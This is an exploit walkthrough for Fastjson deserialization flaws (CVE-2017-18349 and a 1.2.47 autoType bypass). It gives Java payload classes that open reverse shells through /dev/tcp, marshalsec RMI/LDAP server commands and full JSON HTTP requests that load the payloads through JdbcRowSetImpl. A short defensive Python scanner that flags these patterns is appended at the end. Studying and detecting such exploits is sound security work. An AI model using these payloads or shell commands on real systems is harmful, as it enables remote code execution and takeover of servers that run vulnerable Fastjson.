Fastjson
1. Vulnerability reproduction
CVE-2017-18349
Affected versions: Fastjson <= 1.2.24
Create TouchFile.java:
```java
import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
    // Static initializer runs as soon as the class is loaded via the JNDI reference
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            // IP/PORT are placeholders for the listener address
            String[] commands = {"/bin/bash", "-c", "bash -i >& /dev/tcp/IP/PORT 0>&1"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
        }
    }
}
```
Compile it to TouchFile.class and place the class file in the web root of your own HTTP server:
```
javac TouchFile.java
```
marshalsec tool: https://github.com/mbechler/marshalsec
Start the RMI reference server listening on port 9999 (YOUR_WEB_SERVER_IP is a placeholder):
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://YOUR_WEB_SERVER_IP:80/#TouchFile" 9999
```
Start an nc listener first, then send the request below to obtain the reverse shell:
```http
POST / HTTP/1.1
Host: 192.168.135.131:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 164

{
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "rmi://192.168.165.79:9999/TouchFile",
    "autoCommit": true
  }
}
```
1.2.47 RCE
Affected versions: Fastjson <= 1.2.47
Create Exploit.java:
```java
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit {
    // Public no-arg constructor: invoked when the class is instantiated via the JNDI reference
    public Exploit() throws Exception {
        // IP/PORT are placeholders for the listener address
        Process p = Runtime.getRuntime().exec(new String[]{
            "/bin/bash", "-c",
            "exec 5<>/dev/tcp/IP/PORT;cat <&5 | while read line; do $line 2>&5 >&5; done"
        });
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));
        String line;
        while ((line = reader.readLine()) != null) {
            System.out.println(line);
        }
        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}
```
Compile it to Exploit.class and place the class file in the web root of your own HTTP server:
```
javac Exploit.java
```
marshalsec tool: https://github.com/mbechler/marshalsec
Start the JNDI reference server (LDAP in this case) listening on port 9999 (YOUR_WEB_SERVER_IP is a placeholder):
```
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR_WEB_SERVER_IP:80/#Exploit" 9999
```
Start an nc listener first, then send the request below to obtain the reverse shell:
```http
POST / HTTP/1.1
Host: 192.168.135.131:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 267

{
  "a": {
    "@type": "java.lang.Class",
    "val": "com.sun.rowset.JdbcRowSetImpl"
  },
  "b": {
    "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://192.168.165.79:9999/Exploit",
    "autoCommit": true
  }
}
```
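As an added defensive example (not part of the original write-up or of Fastjson itself), the following Python scanner walks a JSON request body and flags the autoType patterns both requests above rely on: any `@type` key, the `com.sun.rowset.JdbcRowSetImpl` gadget, the `java.lang.Class`/`val` cache trick used against 1.2.47, and `rmi://`/`ldap://` references. The sample bodies are constructed copies of the two payloads with a placeholder host.

```python
import json
from typing import Any, List

# Added example: request-body scanner for Fastjson autoType/JNDI patterns.
# Class names and URL schemes come from the write-up; samples are constructed.
KNOWN_GADGETS = {"com.sun.rowset.JdbcRowSetImpl"}
JNDI_SCHEMES = ("rmi://", "ldap://")


def scan_fastjson(body: str) -> List[str]:
    """Return a list of findings for one JSON body (empty list means clean)."""
    try:
        data = json.loads(body)
    except ValueError:
        return ["invalid JSON"]
    findings: List[str] = []
    _walk(data, "$", findings)
    return findings


def _walk(node: Any, path: str, findings: List[str]) -> None:
    if isinstance(node, dict):
        t = node.get("@type")
        if isinstance(t, str):
            findings.append(f"{path}: @type autoType key -> {t}")
            if t in KNOWN_GADGETS:
                findings.append(f"{path}: known JNDI gadget class {t}")
            # 1.2.47 bypass: java.lang.Class with "val" loads a class into the
            # deserializer cache so a later @type slips past the blacklist.
            if t == "java.lang.Class" and isinstance(node.get("val"), str):
                findings.append(f"{path}: java.lang.Class/val cache-poisoning -> {node['val']}")
        for k, v in node.items():
            _walk(v, f"{path}.{k}", findings)
    elif isinstance(node, list):
        for i, v in enumerate(node):
            _walk(v, f"{path}[{i}]", findings)
    elif isinstance(node, str):
        if node.lower().startswith(JNDI_SCHEMES):
            findings.append(f"{path}: JNDI reference {node}")


# Constructed sample bodies modelled on the two requests above (placeholder host).
SAMPLE_1_2_24 = '{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://ATTACKER_HOST:9999/TouchFile","autoCommit":true}}'
SAMPLE_1_2_47 = '{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://ATTACKER_HOST:9999/Exploit","autoCommit":true}}'
BENIGN = '{"user":{"name":"alice","roles":["admin"]}}'

if __name__ == "__main__":
    for name, body in [("1.2.24", SAMPLE_1_2_24), ("1.2.47", SAMPLE_1_2_47), ("benign", BENIGN)]:
        print(name, scan_fastjson(body) or ["clean"])
```

In a real deployment the same check belongs in front of the deserializer (a WAF rule or request filter), alongside disabling autoType or enabling Fastjson's safe mode on the server side.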